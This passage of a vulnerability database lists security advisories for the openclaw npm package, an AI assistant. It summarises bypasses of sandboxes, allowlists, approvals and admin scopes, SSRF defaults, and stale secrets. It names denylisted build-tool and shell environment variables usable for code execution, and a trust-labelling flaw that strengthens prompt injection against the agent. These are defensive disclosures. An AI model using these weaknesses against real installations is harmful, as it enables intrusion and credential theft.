| purl | pkg:npm/openclaw@2026.3.24 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
|
VCID-1j3m-fecr-f7cn
Aliases: CVE-2026-41376 GHSA-rg8m-3943-vm6q |
OpenClaw: Matrix thread root and reply context bypass sender allowlist ## Summary Matrix thread root and reply context bypass sender allowlist ## Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: Real in shipped v2026.3.28 Matrix because fetched thread-root/reply context bypasses sender allowlists, with unreleased mainline filtering fix. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `8a563d603b70ef6338915f0527bee87282c3bad5` — 2026-03-31T17:09:03+01:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-1p3b-pfnn-x7ad
Aliases: GHSA-89hr-6x2p-8xjv |
Duplicate Advisory: OpenClaw's device removal and token revocation do not terminate active WebSocket sessions ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-2pr2-hcv6-7gwv. This link is maintained to preserve external references. ### Original Description OpenClaw before 2026.3.28 fails to disconnect active WebSocket sessions when devices are removed or tokens are revoked. Attackers with revoked credentials can maintain unauthorized access through existing live sessions until forced reconnection. |
Affected by 150 other vulnerabilities. |
|
VCID-1p5p-eth5-3ufu
Aliases: CVE-2026-41330 GHSA-9gp8-hjxr-6f34 |
OpenClaw: Host exec environment overrides miss proxy, TLS, Docker, and Git TLS controls ## Summary Host exec environment overrides miss proxy, TLS, Docker, and Git TLS controls ## Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: Real in shipped v2026.3.28: host exec env policy still missed proxy, TLS, Docker, and Git TLS variables until 4d912e0451 on 2026-03-31; maintainers already accepted it and the fix is unreleased. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `4d912e04519b4bd53b248437c53748cdebce9a41` — 2026-03-31T21:25:36+09:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-1pbz-8rnx-dkhe
Aliases: CVE-2026-42432 GHSA-5wj5-87vq-39xm |
OpenClaw: Node Pairing Reconnect Command Escalation Bypasses operator.admin Scope Requirement ## Impact Node Pairing Reconnect Command Escalation Bypasses operator.admin Scope Requirement. A previously paired node could reconnect with a broader command set, including exec-capable commands, without forcing the operator/admin re-pairing path. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<=2026.4.5` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @zsxsoft and @KeenSecurityLab for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-1smq-mbty-jkaj
Aliases: CVE-2026-41294 GHSA-8rh7-6779-cjqq |
OpenClaw has a CWD `.env` environment variable injection which bypasses host-env policy and allows config takeover ## Summary OpenClaw loaded the current working directory `.env` before trusted state-dir configuration, allowing untrusted workspace state to inject host environment values. ## Impact A repository or workspace containing a malicious `.env` file could override runtime configuration and security-sensitive environment settings when OpenClaw started there. ## Affected Component `src/infra/dotenv.ts, src/cli/dotenv.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `6a79324802` (`Filter untrusted CWD .env entries before OpenClaw startup`). |
Affected by 150 other vulnerabilities. |
|
VCID-24m7-jx1g-hqde
Aliases: CVE-2026-41299 GHSA-6xg4-82hv-cp6f |
OpenClaw: Gateway chat.send ACP-only provenance guard could be bypassed by client identity spoofing ## Summary ACP-only provenance fields in `chat.send` were gated by self-declared client metadata from the WebSocket handshake rather than verified authorization state. ## Impact A normal authenticated operator client could spoof ACP identity labels and inject reserved provenance fields intended only for the ACP bridge. ## Affected Component `src/gateway/server-methods/chat.ts, src/gateway/server/ws-connection/message-handler.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `4b9542716c` (`Gateway: require verified scope for chat provenance`). |
Affected by 150 other vulnerabilities. |
|
VCID-258k-a4dw-tfae
Aliases: GHSA-w6wx-jq6j-6mcj |
OpenClaw: pnpm dlx approvals did not bind local script operands ## Summary Before OpenClaw 2026.4.2, `pnpm dlx` approval planning did not bind local script operands the same way as related `pnpm exec` flows. A local script approved through a `pnpm dlx` path could be replaced before execution without invalidating the approval. ## Impact An operator could approve a benign local script and then execute modified script contents through the still-valid approval plan. This was an approval-integrity bug in the node-host command-planning path. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `176c059b05357df1bc09d4328a2380670859eeff` — bind local scripts in `pnpm dlx` approval plans ## Release Process Note The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live. Thanks @Kazamayc for reporting. |
Affected by 80 other vulnerabilities. |
|
VCID-26kp-dbu2-pqej
Aliases: CVE-2026-41300 GHSA-9f4w-67g7-mqwv |
OpenClaw: Endpoint persists after trust decline, leaking gateway credentials ## Summary Remote onboarding preserves attacker-discovered endpoint after trust decline, routing gateway credentials to it ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: Real shipped onboarding trust-decline bug because the declined discovered URL survived into the manual prompt, but operator acceptance of that prefill is still required, so medium. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `2a75416634837c21ed05b8c3ed906eb7a7807060` — 2026-03-30T20:03:06+01:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @zsxsoft for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-26sg-e29u-hkf3
Aliases: CVE-2026-41382 GHSA-x2m8-53h4-6hch |
OpenClaw: Discord voice ingress authorization can be bypassed via channel, name, and stale-role validation gaps ## Summary Discord voice ingress authorization can be bypassed via channel, name, and stale-role validation gaps ## Current Maintainer Triage - Status: narrow - Assessment: Real in shipped v2026.3.28 Discord voice ingress, but impact is channel/member allowlist bypass rather than a broader critical auth break and mainline fix is unreleased. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `dba96e7507e0900f120e5e28e57755d69bf78759` — 2026-03-31T21:29:13+09:00 OpenClaw thanks @cyjhhh for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-294z-6z8j-97bx
Aliases: CVE-2026-41359 GHSA-767m-xrhc-fxm7 |
OpenClaw: Gateway operator.write Can Reach Admin-Class Telegram Config and Cron Persistence via send ## Summary Gateway operator.write Can Reach Admin-Class Telegram Config and Cron Persistence via send ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: Real shipped operator.write to admin-class Telegram config or cron persistence bug, but it is an authenticated sink-specific escalation and high is too high given the narrower scope. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.24` - Patched versions: `>= 2026.3.28` - First stable tag containing the fix: `v2026.3.28` ## Fix Commit(s) - `b7d70ade3b9900dbe97bd73be9c02e924ff3c986` — 2026-03-25T12:12:09-06:00 ## Release Process Note - The fix is already present in released version `2026.3.28`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @zpbrent for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-29a1-7ar7-67e1
Aliases: CVE-2026-43585 GHSA-xmxx-7p24-h892 |
OpenClaw: Gateway HTTP endpoints re-resolve bearer auth after SecretRef rotation ## Summary Gateway HTTP and WebSocket handlers captured the resolved bearer-auth configuration when the server started. After a SecretRef rotation, the already-running gateway could continue accepting the old bearer token until restart. ## Impact A bearer token that should have been revoked by SecretRef rotation could remain valid on the gateway HTTP and upgrade surfaces for the lifetime of the process. Severity remains high because the old token could continue to authorize gateway requests after operators believed it was rotated out. ## Affected versions - Affected: `< 2026.4.15` - Patched: `2026.4.15` ## Fix OpenClaw `2026.4.15` resolves active gateway auth from the runtime secret snapshot per request and per upgrade instead of using a stale startup-time value. Verified in `v2026.4.15`: - `src/gateway/server.impl.ts` exposes `getResolvedAuth()` backed by the current runtime secret snapshot. - `src/gateway/server-http.ts` calls `getResolvedAuth()` for each HTTP request and WebSocket upgrade before running auth checks. - `src/gateway/server-http.probe.test.ts` verifies `/ready` re-resolves bearer auth after rotation and rejects the old token. Fix commit included in `v2026.4.15` and absent from `v2026.4.14`: - `acd4e0a32f12e1ad85f3130f63b42443ce90f094` via PR #66651 Thanks to @zsxsoft, Keen Security Lab, and @qclawer for reporting this issue. |
Affected by 24 other vulnerabilities. |
|
VCID-2c8p-gbaw-3ye4
Aliases: CVE-2026-44999 GHSA-57r2-h2wj-g887 |
OpenClaw: Isolated cron awareness events were recorded as trusted system events ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `< 2026.4.20` - Patched version: `2026.4.20` ## Impact Output from webhook-triggered isolated cron agent runs could be queued into the main session awareness stream without `trusted: false`. That made the event render as a trusted `System:` event instead of an untrusted system event. This is a trust-labeling issue that can strengthen prompt-injection impact, but it does not directly bypass gateway auth, tool policy, or sandboxing. Severity is low. ## Fix OpenClaw now preserves untrusted labels for isolated cron awareness events and forwards the trust flag through cron delivery helpers. Fix commit: - `f61896b03cc7031f51106a04566831f4ac2a0bd7` ## Release Fixed in OpenClaw `2026.4.20`. |
Affected by 12 other vulnerabilities. |
|
VCID-2h6a-becf-x7ej
Aliases: CVE-2026-41915 GHSA-cm8v-2vh9-cxf3 |
OpenClaw: GIT_DIR and related git plumbing env vars missing from exec env denylist (GHSA-m866-6qv5-p2fg variant) ## Impact GIT_DIR and related git plumbing env vars missing from exec env denylist (GHSA-m866-6qv5-p2fg variant). Git plumbing environment variables were not removed before host exec and could redirect Git operations. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<=2026.3.30` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @boy-hack of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-2hca-3v8f-f3e8
Aliases: CVE-2026-35663 GHSA-9hjh-fr4f-gxc4 |
OpenClaw: Gateway Backend Reconnect lets Non-Admin Operator Scopes Self-Claim operator.admin ## Summary Gateway Backend Reconnect lets Non-Admin Operator Scopes Self-Claim operator.admin ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details Backend-labeled reconnects could previously self-request broader scopes and bypass pairing, allowing non-admin operators to reconnect as `operator.admin`. Commit `d3d8e316bd819d3c7e34253aeb7eccb2510f5f48` removes the backend self-pairing skip and requires pairing when requested scopes exceed the approved baseline. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `d3d8e316bd819d3c7e34253aeb7eccb2510f5f48`. ## Fix Commit(s) - `d3d8e316bd819d3c7e34253aeb7eccb2510f5f48` | There are no reported fixed by versions. |
|
VCID-2khh-wv8p-97ff
Aliases: CVE-2026-42435 GHSA-j6c7-3h5x-99g9 |
OpenClaw: Shell-wrapper detection missed env-argv assignment injection forms ## Summary Shell-wrapper detection missed env-argv assignment injection forms. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `>= 2026.2.22 < 2026.4.12` - Patched versions: `>= 2026.4.12` ## Impact Exec preflight handling missed shell-wrapper and argv-level environment assignment forms that could affect execution semantics, including high-risk shell environment controls. ## Technical Details The fix broadens shell-wrapper detection and blocks environment assignments in argv forms. High-risk shell variables such as `SHELLOPTS` and `PS4` are covered by the host environment security policy. ## Fix The issue was fixed in #65717. The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `8f8492d172f4c5b4fd7dd9a47855ed620c8770ab` - PR: #65717 ## Release Process Note Users should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @decsecre583 for reporting this issue. |
Affected by 37 other vulnerabilities. |
|
VCID-2mxq-krq5-bycx
Aliases: CVE-2026-43574 GHSA-49cg-279w-m73x |
OpenClaw: Empty approver lists could grant explicit approval authorization ## Summary Empty approver lists could grant explicit approval authorization. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.12` - Patched versions: `>= 2026.4.12` ## Impact For helper-backed channels, an empty resolved approver list could be interpreted as explicit approval authorization, allowing a sender outside the normal channel authorization gate to resolve pending approvals if they knew an approval id. ## Technical Details The fix prevents empty approver lists from granting explicit approval authorization and adds regression coverage for unauthorized senders. ## Fix The issue was fixed in #65714. The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `0a105c0900de701d2ee9f1abc96b017afbd0afdd` - PR: #65714 ## Release Process Note Users should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @anshumanbh for reporting this issue. |
Affected by 37 other vulnerabilities. |
|
VCID-2uqu-k42d-1baq
Aliases: GHSA-rm5c-4rmf-vvhw |
OpenClaw: Sandbox file operations use check-then-act, bypassing fd-based TOCTOU defenses ## Summary Sandbox file operations use check-then-act, bypassing fd-based TOCTOU defenses ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: Released workspace-only apply_patch remove and mkdir operations were still check-then-act, but the draft overstates scope by bundling broader edit paths; keep it open but narrow it to the actual sandbox-workspace mutation boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `32a4a47d602e0618f87b3e59f94d8c142767f860` — 2026-03-30T16:49:49+01:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-2v8n-mnws-jfc9
Aliases: CVE-2026-41390 GHSA-6pfc-6m7w-m8fx |
OpenClaw has a gateway exec allowlist allow-always bypass via unregistered /usr/bin/script wrapper ## Summary Allow-always persistence did not unwrap `/usr/bin/script` and similar wrappers to the actual executed target before storing trust decisions. ## Impact A user approval for one wrapped command could persist trust for a wrapper binary that later executed a different underlying program. ## Affected Component `src/infra/dispatch-wrapper-resolution.ts, src/infra/exec-wrapper-resolution.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `83da3cfe31` (`infra: unwrap script wrapper approval targets`). |
Affected by 150 other vulnerabilities. |
|
VCID-2wr9-h42m-a7ev
Aliases: CVE-2026-41408 GHSA-4g5x-2jfc-xm98 |
OpenClaw: Tlon media downloads can bypass core safety limits and exhaust disk ## Summary Tlon media downloads can bypass core safety limits and exhaust disk ## Current Maintainer Triage - Status: narrow - Normalized severity: low - Assessment: Shipped v2026.3.28 Tlon media downloads bypassed core size/count/cleanup limits, but this is availability-only resource exhaustion in a bundled plugin path, so low. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `2194587d70d2aef863508b945319c5a7c88b12ce` — 2026-03-31T19:40:15+09:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-32zs-2zs9-uufs
Aliases: GHSA-f6pf-4gjx-c94r |
OpenClaw: Media Parsing Path Traversal Leads to Arbitrary File Read ## Summary OpenClaw <= 2026.3.24 Media Parsing Path Traversal to Arbitrary File Read ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.24` - Patched versions: `>= 2026.3.28` - First stable tag containing the fix: `v2026.3.28` ## Fix Commit(s) - `4797bbc5b96e2cca5532e43b58915c051746fe37` — 2026-03-25T13:35:16-06:00 ## Release Process Note - The fix is already present in released version `2026.3.28`. |
Affected by 150 other vulnerabilities. |
|
VCID-356u-h788-pkgt
Aliases: CVE-2026-40045 GHSA-83f3-hh45-vfw9 |
OpenClaw: Android accepted cleartext remote gateway endpoints and sent stored credentials over ws:// ## Summary Before OpenClaw 2026.4.2, Android accepted non-loopback cleartext `ws://` gateway endpoints and would send stored gateway credentials over that connection. Discovery beacons or setup codes could therefore steer the client onto a cleartext remote endpoint. ## Impact A user who followed a forged discovery result or scanned a crafted setup code could disclose stored gateway credentials to an attacker-controlled endpoint in plaintext. This was a transport-security bug in the Android gateway client. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `a941a4fef9bc43b2973c92d0dcff5b8a426210c5` — require TLS for remote Android gateway endpoints ## Release Process Note The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live. Thanks @zsxsoft for reporting. |
Affected by 80 other vulnerabilities. |
|
VCID-37ep-9smd-zuh9
Aliases: CVE-2026-41399 GHSA-f44p-c7w9-7xr7 |
OpenClaw: Gateway WebSocket Denial of Service via unbounded pre-auth upgrades ## Summary The gateway accepted unbounded concurrent unauthenticated WebSocket upgrades before allocating them to an authenticated session budget. ## Impact An unauthenticated network attacker could consume socket and worker capacity and disrupt WebSocket availability for legitimate clients. ## Affected Component `src/gateway/server-http.ts, src/gateway/server/preauth-connection-budget.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `cb5f7e201f` (`gateway: cap concurrent pre-auth websocket upgrades`). Discovered by: Topsec AlphaLab (wang dong) |
Affected by 150 other vulnerabilities. |
|
VCID-38g8-39ek-xbat
Aliases: GHSA-w85g-3h6x-4xh2 |
OpenClaw: Image pixel-limit guard can fail open on sips and allow decompression-bomb DoS ## Summary Image pixel-limit guard can fail open on sips and allow decompression-bomb DoS ## Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: Shipped v2026.3.28 image processing could fail open on oversized pixel counts and allow decompression-bomb DoS, an availability issue that is valid at medium. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `0ed4f8a72bb140045962e97ab01c94c076b758a4` — 2026-03-31T22:52:55+09:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-3bdd-a9nw-13bn
Aliases: GHSA-9p93-7j67-5pc2 |
OpenClaw: Gateway HTTP /sessions/:sessionKey/kill Reaches Admin Kill Path Without Caller Scope Binding ## Summary Gateway HTTP /sessions/:sessionKey/kill Reaches Admin Kill Path Without Caller Scope Binding. ## Details The HTTP route previously treated any bearer-authenticated request as admin-eligible and could call without binding the action to requester ownership or caller-granted operator scopes. The flaw removes the bearer-token admin fallback and keeps remote session kills on the local-admin or requester-owned path only. | There are no reported fixed by versions. |
|
VCID-3wsw-d4z2-dydt
Aliases: GHSA-f693-58pc-2gfr |
OpenClaw: Telegram legacy allowFrom migration fans default-account trust into all named accounts ## Summary Telegram legacy allowFrom migration fans default-account trust into all named accounts ## Current Maintainer Triage - Status: open - Normalized severity: low - Assessment: Shipped v2026.3.28 Telegram migration fans legacy default-account allowFrom trust into named accounts, which is an in-scope auth-boundary bug and low fits. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `d8c68c8d4265ea6fa5e8c5e056534c351bddef37` — 2026-03-31T12:51:38+01:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @smaeljaish771 for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-3xmj-n798-x3cw
Aliases: CVE-2026-43527 GHSA-53vx-pmqw-863c |
OpenClaw: Browser SSRF policy default allowed private-network navigation ## Summary Browser SSRF policy default allowed private-network navigation. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.14` - Patched versions: `>= 2026.4.14` ## Impact Browser SSRF protection could allow private-network navigation by default in paths where restrictive behavior was expected, exposing internal services or metadata endpoints through browser-driven requests. ## Technical Details The fix preserves strict SSRF configuration semantics, keeps private-network access disabled unless explicitly opted in, and updates loopback CDP readiness handling for the stricter default. ## Fix The issue was fixed in #66354 and #66386. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `024f4614a1a1831406e763adc40ef226e3d5e9ed` - `1dabfef28db523e7de81edeb3dd689e9171236a2` - `213c36cf51121ef6c05cfccd78037371f968f31a` - `7eecfa411df3d12e6b810e6ca5df47254fc3db3f` - PR: #66354, #66386 ## Release Process Note Users should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue. |
Affected by 30 other vulnerabilities. |
|
VCID-3zwq-dz2u-pqgv
Aliases: CVE-2026-42427 GHSA-7437-7hg8-frrw |
OpenClaw: HGRCPATH, CARGO_BUILD_RUSTC_WRAPPER, RUSTC_WRAPPER, and MAKEFLAGS missing from exec env denylist — RCE via build tool env injection (GHSA-cm8v-2vh9-cxf3 class) ## Impact HGRCPATH, CARGO_BUILD_RUSTC_WRAPPER, RUSTC_WRAPPER, and MAKEFLAGS missing from exec env denylist — RCE via build tool env injection (GHSA-cm8v-2vh9-cxf3 class). Missing denylist entries allowed hostile build-tool environment variables to influence host exec commands. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `< 2026.4.8` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @boy-hack of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-3zx4-t8cj-kbfn
Aliases: CVE-2026-41329 GHSA-g5cg-8x5w-7jpm |
OpenClaw: Heartbeat context inheritance bypasses sandbox via senderIsOwner escalation ## Summary Heartbeat context inheritance bypasses sandbox via senderIsOwner escalation ## Current Maintainer Triage - Status: open - Normalized severity: Critical ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `a30214a624946fc5c85c9558a27c1580172374fd` — 2026-03-31T09:06:51+09:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-4316-7q9a-xuhx
Aliases: CVE-2026-45005 GHSA-q8ff-7ffm-m3r9 |
OpenClaw's Webhooks SecretRef route secret remains valid after rotation/reload ## Summary OpenClaw webhooks allowed route secrets to be backed by `SecretRef` values, but cached the resolved secret for a route. After an operator rotated the underlying secret and ran `openclaw secrets reload`, the previous resolved webhook secret could remain valid until the plugin or gateway restarted. ## Impact An attacker who already had a previously valid webhook route secret could continue authenticating webhook requests after the operator rotated the secret and reloaded secrets. This weakened credential rotation for webhook routes and could allow continued invocation of the configured webhook task flow until restart. ## Affected Packages / Versions - Package: `openclaw` on npm - Affected: versions before `2026.4.23` - Fixed: `2026.4.23` - Latest stable verified fixed: `openclaw@2026.4.23`, tag `v2026.4.23` ## Fix Webhook route authentication now resolves `SecretRef`-backed route secrets on each request. A rotated secret becomes effective after `openclaw secrets reload` without requiring a gateway or plugin restart, and the old secret is rejected. ## Fix Commit(s) - `36c4a372a0ad5dca8bfc0d93f7aab9c2f2de66fa` (`fix(webhooks): reload route secrets per request`) ## Severity Severity remains `medium`. The attack requires possession of a previously valid route secret, but the stale credential can continue to authorize webhook actions after rotation. |
Affected by 0 other vulnerabilities. |
|
VCID-4hz5-f2pw-3yb4
Aliases: CVE-2026-41394 GHSA-mhgq-xpfq-6r66 |
OpenClaw: Unauthenticated plugin-auth HTTP routes receive operator runtime scopes ## Summary Unauthenticated plugin-auth HTTP routes receive operator runtime scopes ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: v2026.3.28 still gives auth:"plugin" routes operator WRITE_SCOPE, but impact should stay limited to plugin routes that actually touch privileged runtime actions before plugin auth completes. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `2a1db0c0f1fa375004a95ba0ef030534790a6d47` — 2026-04-01T00:20:49+09:00 OpenClaw thanks @davidluzsilva for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-4jwj-6s5z-wbeq
Aliases: CVE-2026-33576 GHSA-v2v2-f783-358j |
OpenClaw: Zalo channel downloads media before sender authorization ## Summary The Zalo image path fetched and stored inbound media before the DM/pairing authorization checks ran. ## Impact Unauthorized senders could force network fetches and disk writes in the inbound media store even when the message itself was rejected. ## Affected Component `extensions/zalo/src/monitor.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `68ceaf7a5f` (`zalo: gate image downloads before DM auth`). OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-4nwq-14y4-xkhp
Aliases: CVE-2026-35623 GHSA-xq8g-hgh6-87hv |
OpenClaw: BlueBubbles Webhook Missing Rate Limiting Enables Brute-Force Password Guessing ## Summary BlueBubbles Webhook Missing Guess Rate Limiting Enables Brute-Force Guessing of Weak Webhook Password ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details BlueBubbles webhook auth previously rejected wrong passwords without throttling repeated guesses, allowing brute-force attempts against weak webhook passwords. Commit `5e08ce36d522a1c96df2bfe88e39303ae2643d92` adds repeated-guess throttling before auth failure responses. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `5e08ce36d522a1c96df2bfe88e39303ae2643d92`. ## Fix Commit(s) - `5e08ce36d522a1c96df2bfe88e39303ae2643d92` | There are no reported fixed by versions. |
|
VCID-4u3z-rs45-gbhe
Aliases: CVE-2026-45003 GHSA-55cf-xx38-4p9p |
OpenClaw: Workspace dotenv files cannot override connector endpoint hosts ## Summary Workspace dotenv files cannot override connector endpoint hosts. ## Affected Packages / Versions - Package: openclaw (npm) - Affected versions: <= 2026.4.21 - Fixed version: 2026.4.22 ## Impact A workspace .env file could set connector endpoint variables for Matrix, Mattermost, IRC, or Synology-related connectors and redirect runtime traffic away from the operator-configured endpoint. ## Fix Workspace .env loading now blocks those endpoint variables, including per-account Matrix homeserver suffixes and generic base-url/API-host style overrides. Trusted global runtime dotenv loading remains separate. ## Fix Commit(s) - 0623079e98abf7202591f1b04a89755eb7ec9272 ## Verification - The fix commit is contained in the public v2026.4.22 tag. - openclaw@2026.4.22 is published on npm and the compiled package contains the fix. - Focused regression coverage for this path passed before publication. OpenClaw thanks @qi-scape for reporting. |
Affected by 3 other vulnerabilities. |
|
VCID-4uqc-3h1c-4yhs
Aliases: CVE-2026-35640 GHSA-3h52-cx59-c456 |
